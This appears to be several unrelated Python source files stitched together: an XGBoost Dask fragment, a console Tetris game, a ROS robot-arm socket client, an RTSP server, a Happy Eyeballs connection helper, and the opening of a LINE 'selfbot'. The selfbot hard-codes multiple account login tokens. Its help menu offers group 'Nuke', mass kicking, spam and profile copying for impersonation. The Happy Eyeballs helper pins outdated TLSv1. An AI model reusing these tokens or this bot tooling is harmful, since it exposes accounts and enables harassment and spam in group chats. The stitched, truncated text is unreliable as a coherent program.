futures_shape = client.map(dispatched_get_shape,
range(len(worker_map)),
pure=False,
workers=list(worker_map.keys()))
shapes = client.gather(futures_shape)
arrays = []
for i in range(len(futures_shape)):
arrays.append(da.from_delayed(futures[i], shape=(shapes[i][0], ),
dtype=numpy.float32))
predictions = da.concatenate(arrays, axis=0)
return predictions
def _evaluation_matrices(client, validation_set, sample_weights):
'''
Parameters
----------
validation_set: list of tuples
Each tuple contains a validation dataset including input X and label y.
E.g.:
.. code-block:: python
[(X_0, y_0), (X_1, y_1), ... ]
sample_weights: list of arrays
The weight vector for validation data.
Returns
-------
evals: list of validation DMatrix
'''
evals = []
if validation_set is not None:
assert isinstance(validation_set, list)
for i, e in enumerate(validation_set):
w = (sample_weights[i]
if sample_weights is not None else None)
dmat = DaskDMatrix(client=client, data=e[0], label=e[1], weight=w)
evals.append((dmat, 'validation_{}'.format(i)))
else:
evals = None
return evals
class DaskScikitLearnBase(XGBModel):
'''Base class for implementing scikit-learn interface with Dask'''
_client = None
# pylint: disable=arguments-differ
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
'''Fit the regressor.
Parameters
----------
X : array_like
Feature matrix
y : array_like
Labels
sample_weight : array_like
instance weights
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of group weights on the i-th validation set.'''
raise NotImplementedError
def predict(self, data): # pylint: disable=arguments-differ
'''Predict with `data`.
Parameters
----------
data: data that can be used to construct a DaskDMatrix
Returns
-------
prediction : dask.array.Array'''
raise NotImplementedError
@property
def client(self):
'''The dask client used in this model.'''
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt):
self._client = clt
@xgboost_model_doc("""Implementation of the Scikit-Learn API for XGBoost.""",
['estimators', 'model'])
class DaskXGBRegressor(DaskScikitLearnBase):
# pylint: disable=missing-docstring
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
_assert_dask_support()
dtrain = DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights)
params = self.get_xgb_params()
evals = _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set)
results = train(self.client, params, dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
def predict(self, data): # pylint: disable=arguments-differ
_assert_dask_support()
test_dmatrix = DaskDMatrix(client=self.client, data=data)
pred_probs = predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model']
)
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
# pylint: disable=missing-docstring
_client = None
def fit(self,
X,
y,
sample_weights=None,
eval_set=None,
sample_weight_eval_set=None):
_assert_dask_support()
dtrain = DaskDMatrix(client=self.client,
data=X, label=y, weight=sample_weights)
params = self.get_xgb_params()
# pylint: disable=attribute-defined-outside-init
if isinstance(y, (da.Array)):
self.classes_ = da.unique(y).compute()
else:
self.classes_ = y.drop_duplicates().compute()
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
evals = _evaluation_matrices(self.client,
eval_set, sample_weight_eval_set)
results = train(self.client, params, dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals)
self._Booster = results['booster']
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
def predict(self, data): # pylint: disable=arguments-differ
_assert_dask_support()
test_dmatrix = DaskDMatrix(client=self.client, data=data)
pred_probs = predict(client=self.client,
model=self.get_booster(), data=test_dmatrix)
return pred_probs
|
main.py
|
from tetris import *
from random import *
import threading
def LED_init():
thread=threading.Thread(target=LMD.main, args=())
thread.daemon = True  # setDaemon() is deprecated in favour of the daemon attribute
thread.start()
return
def rotate(m_array):
size = len(m_array)
r_array = [[0] * size for _ in range(size)]
for y in range(size):
for x in range(size):
r_array[x][size-1-y] = m_array[y][x]
return r_array
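# Worked example for rotate(): it maps (y, x) -> (x, size-1-y), i.e. one
# clockwise quarter turn of a square block array (values are illustrative):
#
#   rotate([[1, 2],
#           [3, 4]])  ==  [[3, 1],
#                          [4, 2]]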
def initSetOfBlockArrays():
arrayBlks = [ [ [ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ], # ㅁ
[ 0, 0, 1, 0 ] ], # ㅁ
[ [0, 1, 0],
[1, 1, 1], # ㅗ
[0, 0, 0] ],
[ [1, 0, 0],
[1, 1, 1], # ㄴ
[0, 0, 0] ],
[ [0, 0, 1], # ㅁ
[1, 1, 1], # ㅁㅁㅁ
[0, 0, 0] ], #
[ [1, 1], # ㅁ
[1, 1] ],
[ [0, 1, 1], # ㅁㅁ
[1, 1, 0], # ㅁㅁ
[0, 0, 0] ], #
[ [1, 1, 0], # ㅁㅁ
[0, 1, 1], # ㅁㅁ
[0, 0, 0] ] #
]
nBlocks = len(arrayBlks)
setOfBlockArrays = [[0] * 4 for _ in range(nBlocks)]
for idxBlockType in range(nBlocks):
temp_array = arrayBlks[idxBlockType]
setOfBlockArrays[idxBlockType][0] = temp_array
for idxBlockDegree in range(1,4):
temp_array = rotate(temp_array)
setOfBlockArrays[idxBlockType][idxBlockDegree] = temp_array
return setOfBlockArrays
if __name__ == "__main__":
#LED_init()
setOfBlockArrays = initSetOfBlockArrays()
Tetris.init(setOfBlockArrays)
board = Tetris(32, 16)
idxBlockType = randint(0, 6)
key = '0' + str(idxBlockType)
board.accept(key)
board.printScreen()
while True:
key = input('Enter a key from [ q (quit), a (left), d (right), s (down), w (rotate), \' \' (drop) ] : ')
if key != 'q':
state = board.accept(key)
board.printScreen()
if state == TetrisState.NewBlock:
idxBlockType = randint(0, 6)
key = '0' + str(idxBlockType)
state = board.accept(key)
if state == TetrisState.Finished:
board.printScreen()
print('Game Over!!!')
break
board.printScreen()
else:
print('Game aborted...')
break
print('Program terminated...')
### end of pytet.py
|
Hiwin_RT605_ArmCommand_Socket_20190627181108.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator becomes RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
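# Hedged usage sketch of the switch/case recipe above (the values are
# illustrative): `for case in switch(x)` yields the match callable once, and
# `case(value)` returns True for the first matching value; `case()` with no
# arguments acts as the default branch.
#
#   for case in switch(command):
#       if case(Taskcmd.Action_Type.PtoP):
#           ...   # handle point-to-point motion
#           break
#       if case():        # default branch
#           ...   # unknown command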
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm-mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed-mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
def socket_talker(): ## create the ROS server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
rospy.spin()
##---------- socket packet transmission ----------##
##--------------- send arm commands over the socket ---------------
def Socket_command():
global Socket,arm_mode_flag,data
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#------- set arm speed --------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#------- set arm delay time --------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#------- set arm fast / safe speed mode --------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 6 ## switch back to the initial mode state
print(data)
Socket.send(data.encode('utf-8')) # send over the socket; encode the str before transmission
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
# the arm side reports its current state
if str(feedback_str[2]) == '48':# 'F': the arm is Ready to accept the next motion command
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# 'T': the arm is busy and cannot run the next motion command
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# '6': the strategy has finished
state_feedback.ArmState = 6
print("shutdown")
# check the send flag
if str(feedback_str[4]) == '48':# returns 0: false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':# returns 1: true
state_feedback.SentFlag = 1
##--------------- send arm commands over the socket: end ---------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##------------- socket packet transmission: end --------------##
## multithreading
# def thread_test():
# socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6 ## switch to the initial mode state
t = threading.Thread(target=socket_client)
t.start() # start the worker thread
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
RTSPServer.py
|
# !/usr/bin/python3
__author__ = 'Simon Blandford'
import time
# Based on https://github.com/TibbersDriveMustang/Video-Streaming-Server-and-Client
from Log import log
try:
import config
except ImportError:
import config_dist as config
import socket
import threading
import RTSPServerSession
ended = False
thread = False
hubTcpSocket = False
def runThread():
global thread
log().info('Starting Hub server thread')
thread = threading.Thread(target=server)
thread.start()
def sigStopThread():
global ended
log().info('Ending Hub server thread')
ended = True
def waitStopThread():
global thread
global hubTcpSocket
if thread:
thread.join()
hubTcpSocket = False;
thread = False
def server():
global hubTcpSocket
hubTcpSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hubTcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
hubTcpSocket.bind(('', config.HUB_SERVER_PORT))
log().info("Hub server Listening for incoming request on port %d...", config.HUB_SERVER_PORT)
hubTcpSocket.listen(config.HUB_LISTEN_BACKLOG)
hubTcpSocket.settimeout(config.SOCKET_TIMEOUT)
# Receive client info (address,port) through RTSP/HTTP/TCP session
while not ended:
try:
clientInfo = {}
try:
# TODO The IP address appears to be this one and not from the source. Check in Wireshark
clientInfo['connection'], (clientInfo['IP'], clientInfo['port']) = hubTcpSocket.accept()
except socket.timeout:
continue
log().debug('Received from %s on port %s', clientInfo['IP'], clientInfo['port'])
RTSPServerSession.HubServerSession(clientInfo).runThread()
except Exception as e:
log().error(e.__doc__)
log().error(str(e))
time.sleep(1)
hubTcpSocket.close()
# Program Start Point
if __name__ == "__main__":
runThread()
|
happyeyeballs.py
|
#!/usr/bin/python3
# Python implementation of RFC 6555 / Happy Eyeballs: find the quickest IPv4/IPv6 connection
# See https://tools.ietf.org/html/rfc6555
# Method: Start parallel sessions using threads, and only wait for the quickest successful socket connect
# If the HOST has an IPv6 address, IPv6 is given a head start by delaying IPv4. See https://tools.ietf.org/html/rfc6555#section-4.1
# You can run this as a standalone program, or as a module:
"""
from happyeyeballs import happyeyeballs
print(happyeyeballs('newszilla.xs4all.nl', port=119))
"""
# or with more logging:
"""
from happyeyeballs import happyeyeballs
import logging
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
print(happyeyeballs('newszilla.xs4all.nl', port=119))
"""
import socket
import ssl
import threading
import time
import logging
import queue
DEBUG = False
# called by each thread
def do_socket_connect(queue, ip, PORT, SSL, ipv4delay):
# connect to the ip, and put the result into the queue
if DEBUG:
logging.debug("Input for thread is %s %s %s", ip, PORT, SSL)
try:
# CREATE SOCKET
if ip.find(":") >= 0:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
if ip.find(".") >= 0:
time.sleep(ipv4delay) # IPv4 ... so a delay for IPv4 as we prefer IPv6. Note: ipv4delay could be 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
if not SSL:
# Connect ...
s.connect((ip, PORT))
# ... and close
s.close()
else:
# WRAP SOCKET
wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
# CONNECT
wrappedSocket.connect((ip, PORT))
# CLOSE SOCKET CONNECTION
wrappedSocket.close()
queue.put((ip, True))
if DEBUG:
logging.debug("connect to %s OK", ip)
except:
queue.put((ip, False))
if DEBUG:
logging.debug("connect to %s not OK", ip)
pass
def happyeyeballs(HOST, **kwargs):
# Happyeyeballs function, with caching of the results
# Fill out the parameters into the variables
try:
PORT = kwargs["port"]
except:
PORT = 80
try:
SSL = kwargs["ssl"]
except:
SSL = False
try:
preferipv6 = kwargs["preferipv6"]
except:
preferipv6 = True # prefer IPv6, so give IPv6 connects a head start by delaying IPv4
# Find out if a cached result is available, and recent enough:
timecurrent = int(time.time()) # current time in seconds since epoch
retentionseconds = 100
hostkey = (HOST, PORT, SSL, preferipv6) # Example key: (u'ssl.astraweb.com', 563, True, True)
try:
happyeyeballs.happylist[hostkey] # just to check: does it exist?
# No exception, so entry exists, so let's check the time:
timecached = happyeyeballs.happylist[hostkey][1]
if timecurrent - timecached <= retentionseconds:
if DEBUG:
logging.debug("existing cached result recent enough")
return happyeyeballs.happylist[hostkey][0]
else:
if DEBUG:
logging.debug("existing cached result too old. Find a new one")
# Continue a few lines down
except:
# Exception, so entry not there, so we have to fill it out
if DEBUG:
logging.debug("Host not yet in the cache. Find entry")
pass
# we only arrive here if the entry has to be determined. So let's do that:
# We have to determine the (new) best IP address
start = time.perf_counter()
if DEBUG:
logging.debug("\n\n%s %s %s %s", HOST, PORT, SSL, preferipv6)
ipv4delay = 0
try:
# Check if there is an AAAA / IPv6 result for this host:
socket.getaddrinfo(HOST, PORT, socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
if DEBUG:
logging.debug("IPv6 address found for %s", HOST)
if preferipv6:
ipv4delay = (
0.1
) # preferipv6, AND at least one IPv6 found, so give IPv4 (!) a delay so that IPv6 has a head start and is preferred
except:
if DEBUG:
logging.debug("No IPv6 address found for %s", HOST)
myqueue = queue.Queue() # queue used for threads giving back the results
try:
# Get all IP (IPv4 and IPv6) addresses:
allinfo = socket.getaddrinfo(HOST, PORT, 0, 0, socket.IPPROTO_TCP)
for info in allinfo:
address = info[4][0]
thisthread = threading.Thread(target=do_socket_connect, args=(myqueue, address, PORT, SSL, ipv4delay))
thisthread.daemon = True
thisthread.start()
result = None # default return value, used if none of threads says True/"OK", so no connect on any IP address
# start reading from the Queue for message from the threads:
for i in range(len(allinfo)):
s = myqueue.get() # get a response
if s[1] == True:
result = s[0]
break # the first True/"OK" is enough, so break out of for loop
except:
if DEBUG:
logging.debug("something went wrong in the try block")
result = None
logging.info(
"Quickest IP address for %s (port %s, ssl %s, preferipv6 %s) is %s", HOST, PORT, SSL, preferipv6, result
)
delay = int(1000 * (time.perf_counter() - start))
logging.debug("Happy Eyeballs lookup and port connect took %s ms", delay)
# We're done. Store and return the result
if result:
happyeyeballs.happylist[hostkey] = (result, timecurrent)
if DEBUG:
logging.debug("Determined new result for %s with result %s", hostkey, happyeyeballs.happylist[hostkey])
return result
happyeyeballs.happylist = {} # The cached results. This static variable must be after the def happyeyeballs()
if __name__ == "__main__":
logger = logging.getLogger("")
logger.setLevel(logging.INFO)
if DEBUG:
logger.setLevel(logging.DEBUG)
# plain HTTP/HTTPS sites:
print((happyeyeballs("www.google.com")))
print((happyeyeballs("www.google.com", port=443, ssl=True)))
print((happyeyeballs("www.nu.nl")))
# newsservers:
print((happyeyeballs("newszilla6.xs4all.nl", port=119)))
print((happyeyeballs("newszilla.xs4all.nl", port=119)))
print((happyeyeballs("block.cheapnews.eu", port=119)))
print((happyeyeballs("block.cheapnews.eu", port=443, ssl=True)))
print((happyeyeballs("sslreader.eweka.nl", port=563, ssl=True)))
print((happyeyeballs("news.thundernews.com", port=119)))
print((happyeyeballs("news.thundernews.com", port=119, preferipv6=False)))
print((happyeyeballs("secure.eu.thundernews.com", port=563, ssl=True)))
# Strange cases
print((happyeyeballs("does.not.resolve", port=443, ssl=True)))
print((happyeyeballs("www.google.com", port=119)))
print((happyeyeballs("216.58.211.164")))
|
Selfbot.py
|
# -*- coding: utf-8 -*-
import LINETCR
#import wikipedia
from LINETCR.lib.curve.ttypes import *
#from ASUL.lib.curve.ttypes import *
from datetime import datetime
# https://kaijento.github.io/2017/05/19/web-scraping-youtube.com/
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
from gtts import gTTS
import time,random,sys,json,codecs,threading,glob,urllib,urllib2,urllib3,re,ast,os,subprocess,requests,tempfile
cl =LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='Eq8oqZK3JTqfztqTWny7.MRMd87JLMY8NA0SCe7JEXW.vbl7Kr2tjQ1LqphHyzY3ogPStiHJgqTFB/R2kwF+ms4')
cl.loginResult()
ki = LINETCR.LINE()
ki.login(token='EqHcbM8BSq55e0TGJv3d.CjaQinvalP1FmHKChURWBq.u2K8AtO0FtfUUW19z8YCUSd6fIi6STxPO3KRZAG0CO8')
ki.loginResult()
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='Eq8GV919FJNUMrNPSWc7.AT7NDdbl0H2GLxuGz4QxXW.55ZTTqTEznurl4KqO/emtDspWcZqZyP/dYp3Y0wLKWA')
ki2.loginResult()
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token='EqrZqWr13j43WIcnGcQe.zmCv8kW3miEalfHutIIt+G.Tz3P2Dq5yzpOk3AyoIPDCCya5W5+EaLqRfMZkyX7chE')
ki3.loginResult()
ki4 = LINETCR.LINE()
#ki4.login(qr=True)
ki4.login(token='EqIfsqgCa5qaHAWgeBt5.xYAmvk1yA8gaabeYgdSeXq.movkYMysyGsi8kvUpjL1XxnO0dBdP0NGCRge2OK6o/8')
ki4.loginResult()
ki5 = LINETCR.LINE()
#ki5.login(qr=True)
ki5.login(token='EqgBIrRvAcrk6SKDsKR9.lX4pa6L4onjySYNG0c47Qq.rI/Eeh1goMiTdeMTGpjSBYUq/cPLRSJdc7TyG2EqJcM')
ki5.loginResult()
cl
#ki6 = ASUL.LINE()
#AsulLogged = False
#cl = ASUL.LINE()
#cl.login(token='EoChmq5TXM73ZRg9P8ec.YLgVP2FFH7O3buLlL8m1xa.53z2MiS/devknmPfbJjsBhLEqtWnv6cUujv6wklIJsc')
#cl.loginResult()
print u"่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
╔════☬════♪•●☬●•♪════☬═══╗
่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ
╚════☬════♪•●☬●•♪════☬═══╝
||=====☬คำสั่งทั่วไป☬=====||
☬➣ [Me]➣คอนแทคฉัน
☬➣ [Me @]➣ดูคอนแทคเพื่อน
☬➣ [Tr-th]➣แปลเป็นไทย
☬➣ [Tr-en]➣แปลเป็นอังกฤษ
☬➣ [Ginfo]➣ดูข้อมูลกลุ่ม
☬➣ [Glist]➣ส่งของขวัญ
☬➣ [Cancel]➣ยกเลิกเชิน
☬➣ [Invite]➣เชินตามคอนแทค
☬➣ [Invite: ]➣เชินด้วยเอมไอดี
☬➣ [Unban @]➣ เพิ่มบันชีขาว @
☬➣ [Unban:]➣ เพิ่มบันชีขาวmid
☬➣ [Unban on]➣ เพิ่มบันชีขาวcontact
☬➣ [Ban @ ]➣ เพิ่มบันชีดำ @
☬➣ [Ban:]➣ เพิ่มบันชีดำmid
☬➣ [Ban on ]➣ เพิ่มบันชีดำcontact
☬➣ [Clear ban]เชคแบนโชว์คอนแทค
☬➣ [Link on]☆เปิดลิ้ง
☬➣ [Link off]☆ปิดลิ้ง
☬➣ [Gurl]
☬➣ [Url ]➣ลิ้งกลุ่ม
☬➣ [Gname]
☬➣ [Banlist ]
☬➣ [Details grup]
☬➣ [on]➣ เปิดข้อความต้อนรับ
☬➣ [off]➣ ปิดข้อความต้อนรับ
☬➣ [Respon on]➣เปิดกล่างถึงคนแท้ค
☬➣ [Respon off]➣ปิดกล่าวถึงคนแท้ก
☬➣ [Inviteme:]
☬➣ [Info grup]
☬➣ [Gift-Allgift]➣ [ส่งของขวัญ-ทั้งหมด
☬➣ [Clear grup
☬➣️ [Reject]☆ลบรันตัวเอง
☬➣ [Mic:]☆เชคคอนแทค
☬➣️ [Reject1]➣ [ลบรันคิกเก้อ
☬➣ [Nuke]☆ล้างห้อง
☬➣ [Mention,Tagall]➣แทคทั้งห้อง
☬➣ [Kick @]➣ เตะ @
☬➣ [Kick::]➣ เตะmid
☬➣ [Bc:ct ]
☬➣ [Bc:grup]
☬➣ [Block @]
☬➣ [Youtube]➣ยูทูป
☬➣ [vdo]
☬➣ [Blocklist]
☬➣ [Spam on/off]➣รันข้อความแชท
☬➣ [Mybot]➣คอนแทคบอท
☬➣ [Bot:ct ]
☬➣ [Bot:grup.]
☬➣ [Allname:]
☬➣ [Allbio:]
☬➣ [Gc]☆ดูผู้สร้างห้อง
☬➣ [Speed]☆สปีดบอท
☬➣ [Conban]➣เชคแบน
☬➣ [Mycopy @] ➣ก้อปปี้โปรไฟล์
☬➣ [Copy1 @] ➣ ก้อปปี้คิกเก้อ1
☬➣ [Copy2 @] ➣ ก้อปปี้คิกเก้อ2
☬➣ [Copy3 @] ➣ ก้อปปี้คิกเก้อ3
☬➣ [Copy4 @] ➣ ก้อปปี้คิกเก้อ4
☬➣ [Copy5 @] ➣ ก้อปปีัคิกเก้อ4
☬➣ [Mybackup @ ]➣กลับคืนค่าก้อปปี้
☬➣ [Like:on/off] ➣ออโต้ไลค์ เปิด/ปิด
☬➣ [Add on/off] ➣ออโต้แอด เปิด/ปิด
☬➣ [Join on/off]➣ออโต้เข้ากลุ่ม เปิด/ปิด
☬➣ [Contact on/off]➣อ่านคอนแทค เปิด/ปิด
☬➣ [Leave on/off] ➣ออโต้ออกแชทรวม เปิด/ปิด
☬➣ [Share on/off]➣โชว์ลิ้งโพส เปิด/ปิด
☬➣ [Getname @]➣เชคชื่อเพื่อน
☬➣ [Getbio @]➣เชคตัสเพื่อน
☬➣ [Getprofile @]➣เชคเสตัสเพื่อน
☬➣ [Jam on/off]➣
☬➣ [Jam say:]
☬➣ [Com on/off]
☬➣ [Message set:]
☬➣ [Comment set:]
☬➣ [Pesan add:]
||=====☬P R O T E C T☬=====||
☬➣ [Panick:on/off]
☬➣ [Allprotect on/off]➣ล้อกทั้งหมด เปิด/ปิด
☬➣ [Protect on]☆ป้องกันเปิด/ปิด
☬➣ [Qrprotect on/off]☆ล้อกคิวอารโค้ตเปิด/ปิด
☬➣ [Inviteprotect on/off]☆เชินเปิด/ปิด
☬➣ [Cancelprotect on/off]ยกเชินเปิด/ปิด
☬➣[Staff add/remove @]
||=======☬FOR ADMIN☬=======||
▀██▀────██─██──██████
─██──██────██──██
─████──────██──██████
─██──██────██──██
▄██▄───██──██──██████
╔════☬════♪•●☬●•♪════☬═══╗
Http://line.me/ti/p/~getk3333
╚════☬════♪•●☬●•♪════☬═══╝
||=========================||
"""
help2Message =""" ||==่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ==||
☬คท - ส่งคท.ตัวเอง(Me)
☬ไอดี - ส่งMidตัวเอง
☬คิกเกอร์ - เชคคท.คิกเกอร์ทั้งหมด
☬คิกมา - เรียกคิกเกอร์เข้ากลุ่ม
☬คิกออก - สั่งคิกเกอร์ออกกลุ่ม
☬จุด - ตั้งจุดเชคคนอ่าน
☬อ่าน - เชครายชื่อคนอ่าน
☬เชคกลุ่ม - เชคข้อมูลกลุ่ม
☬ลิสกลุ่ม - เชคกลุ่มที่มีทั้งหมด
☬ยกเชิญ,ยก - ยกเลิกเชิญ
☬Mid @ - เชคMidรายบุคคล
☬ดึง - เชิญคนเข้ากลุ่มด้วยคท.
☬ดึง: - เชิญคนเข้ากลุ่ม้ดวยMid
☬ขาว - แก้ดำ(ส่งคท.)
☬ดำ - เพิ่มบัญชีดำ(ส่งคท.)
☬เชคดำ - เชคบัญชีดำ
☬ล้างดำ - ล้างบัญชีดำ
☬เปิดลิ้ง
☬ปิดลิ้ง
☬ลิ้ง - เปิดและขอลิ้งกลุ่ม
☬Gname: - เปลี่ยนชื่อกลุ่ม
☬ลบรัน - ลบรันตัวเอง
☬ลบรัน1 - ลบรันให้เพื่อน(ขอลิ้งให้ลอคอินก่อน)
☬ขอลิ้ง - ขอลิ้งให้เพื่อนลอคอิน
☬. - เชคสถานะลอคอิน
☬Sp - เชคสปีด
☬Bot sp - เชคสปีดคิกเกอร์
☬Mycopy @ - กอพปี้โปรไฟล์
☬Copy @ - คิกเกอร์1กอพปี้
☬Mybackup - กลับร่างเดิม
☬Backup - คิกเกอร์1กลับร่างเดิม
☬Spam on/off - ส่งข้อความสแปม
||==========||
✯★Creator By 👉่❂>ͣ▪т̶є̶α̶м̶в̶σ̶т̶ℓ👈
"""
helo=""
KAC=[cl,ki,ki2,ki3,ki4,ki5]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
bot1 = cl.getProfile().mid
Bots = [mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid]
admsa = "u9ab983f3b8e59b2f276b4b1c13b8dec7"
admin = "u9ab983f3b8e59b2f276b4b1c13b8dec7"
wait = {
'contact':True,
'detectMention':True,
